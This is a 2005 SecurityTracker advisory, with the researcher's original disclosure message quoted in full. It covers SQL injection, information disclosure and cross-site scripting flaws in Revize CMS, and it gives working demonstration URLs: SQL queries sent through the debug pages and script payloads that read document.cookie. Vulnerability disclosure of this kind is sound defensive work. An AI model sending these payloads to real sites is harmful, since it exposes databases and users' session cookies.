SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Revize CMS Vendors:   Idetix Software Systems
Revize CMS Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015231
SecurityTracker URL:  http://securitytracker.com/id/1015231
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 16 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  

Description:   Lostmon reported a vulnerability in Revize CMS. A remote user can inject SQL commands and conduct cross-site scripting attacks.

The 'query_results.jsp' script does not properly validate user-supplied input in the 'query' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[target]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects

http://[target]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE

A remote user can supply the following URLs to obtain some information about the target site:

http://[target]/revize/debug/apptables.html

http://[target]/revize/debug/main.html

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Revize software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp

http://[target]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp

http://[target]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp

A remote user can request the following URL to view potentially sensitive system information:

http://[target]/revize/conf/

The vendor was notified on November 14, 2005.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Revize software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.idetix.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Java, Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Revize(r) CMS SQL information disclosure and XSS

The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.

The Input passed to the "query" parameter in "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

This may allow a remote attacker execute or manipulate SQL
queries in the backend database.

a remote user can obtain sensitive data , about the target
system if the attacker request directly ' revize.xml '
located in ' conf ' directory...the normal url for this flaw is:
http://[victim]/revize/conf/

#################
version
#################

unknow version of Revize(r) CMS

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE


http://[Victim]/revize/debug/

wen we are in this url , the page have a login form for
accessing, but if we click in any link we can obtain some


http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp



thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC